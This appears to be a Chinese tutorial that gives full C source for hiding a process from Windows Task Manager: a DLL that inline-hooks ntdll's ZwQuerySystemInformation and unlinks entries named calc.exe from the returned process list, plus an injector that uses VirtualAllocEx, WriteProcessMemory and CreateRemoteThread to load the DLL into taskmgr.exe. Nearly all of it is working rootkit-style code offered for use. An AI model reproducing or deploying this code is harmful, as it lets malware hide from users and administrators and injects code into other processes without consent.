InlineHook任务管理器_ZwQuerySystemInformation_隐藏进程

hook步骤:

  • 查找目标函数地址

  • 修改目标函数第一条指令跳转到我们构造的函数

  • 卸载掉钩子,执行正常的目标函数

  • 过滤掉特定信息后返回

hook代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#include<windows.h>
#include<Winternl.h>

BOOL hook_code();
BOOL unHook_code();
NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
char StroneDate[5]={0x00,0x00,0x00,0x00,0x00,};//备份原始字节
DWORD OldProtect;//原始页保护属性
DWORD dwAddress;//跳转偏移地址
FARPROC procaddr;
DWORD num;
byte pBuf[5]={0xE9,0xFF,0xFF,0xFF,0xFF};
typedef NTSTATUS (WINAPI * ZwQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);

BOOL WINAPI DllMain(HMODULE hModule,DWORD call,LPVOID lpreserved)
{
	hook_code();
	return true;
}
BOOL hook_code()
{
	
	
	procaddr = (FARPROC)GetProcAddress(GetModuleHandleA("ntdll.dll"),"ZwQuerySystemInformation");//获取函数地址
	VirtualProtect(procaddr,5,PAGE_EXECUTE_READWRITE,&OldProtect);//修改页保护属性
	if(!StroneDate[0])
	{
			memcpy(StroneDate,procaddr,5);
	}//备份原始指令
	dwAddress = (DWORD)NewZwQuerySystemInformation -(DWORD) procaddr -5;//计算函数偏移 
	memcpy(&(pBuf[1]),&dwAddress,4);//精准偏移
	memcpy(procaddr,pBuf,5);
	VirtualProtect(procaddr,5,OldProtect,&OldProtect);
	return TRUE;
}

BOOL unHook_code()
{
	VirtualProtect(procaddr,5,PAGE_EXECUTE_READWRITE,&OldProtect);
	memcpy(procaddr,StroneDate,5);
	VirtualProtect(procaddr,5,OldProtect,&OldProtect);
	return TRUE;
}
NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength)
{
	unHook_code();
	NTSTATUS status = ((ZwQuerySystemInformation)procaddr)(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
	PSYSTEM_PROCESS_INFORMATION pcurr = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
	PSYSTEM_PROCESS_INFORMATION plast =NULL;//last node
	if(SystemInformationClass == 5)
	{
		while(TRUE)
		{
			if((PWSTR)pcurr->Reserved2[1] != NULL)//ImageName
			{
				if(0 == memcmp(pcurr->Reserved2[1],L"calc.exe",4))
				{
					if(pcurr->NextEntryOffset == 0)
						plast->NextEntryOffset = 0;
					else
						plast->NextEntryOffset += pcurr->NextEntryOffset;
				}
				else
					plast = pcurr;
			}

			if(pcurr->NextEntryOffset == 0)
				break;
			pcurr = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pcurr + pcurr->NextEntryOffset);
		}
	}
	hook_code();
	return status;
	
}

使用远线程注入,将hookdll注入到任务管理器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#include<stdio.h>
#include<windows.h>
#include<Tlhelp32.h>
#define PATH "C:\\Users\\john\\Desktop\\hookdll.dll"//要注入的dll绝对路径
BOOL EnumProcess();
BOOL Inject(DWORD);
DWORD dwPID;
void main()
{
	
	if(EnumProcess())
	{
		Inject(dwPID);
	}

}

BOOL EnumProcess()
{
	PROCESSENTRY32 pe32 = {0};
	pe32.dwSize = sizeof(PROCESSENTRY32);
	HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//拍进程快照
	if (INVALID_HANDLE_VALUE == hProcessSnap)
	{
		printf("CreateToolhelp32Snapshot Error :%d",GetLastError());
	}
	BOOL Ret = Process32First(hProcessSnap,&pe32);//枚举快照
	while(Ret)
	{
		int i = strcmp("taskmgr.exe",pe32.szExeFile);
		if(!i)
		{	
			dwPID = pe32.th32ProcessID;
			return TRUE;
		}
		Ret = Process32Next(hProcessSnap,&pe32);//下一进程信息
	}
	return FALSE;
}
BOOL Inject(DWORD dwPID)
{
	HANDLE hand = OpenProcess(PROCESS_ALL_ACCESS,NULL,dwPID);
	LPVOID lpaddress = VirtualAllocEx(hand,NULL,0x1000,MEM_COMMIT,PAGE_EXECUTE_READWRITE);//申请指定大小内存,分配读写执行权限
	bool write = WriteProcessMemory(hand,lpaddress,PATH,0x1000,NULL);//实现注入
	CreateRemoteThread(hand,NULL,NULL,(LPTHREAD_START_ROUTINE)LoadLibrary,lpaddress,NULL,NULL);//创建线程执行dll
	return TRUE;
}

效果图如下: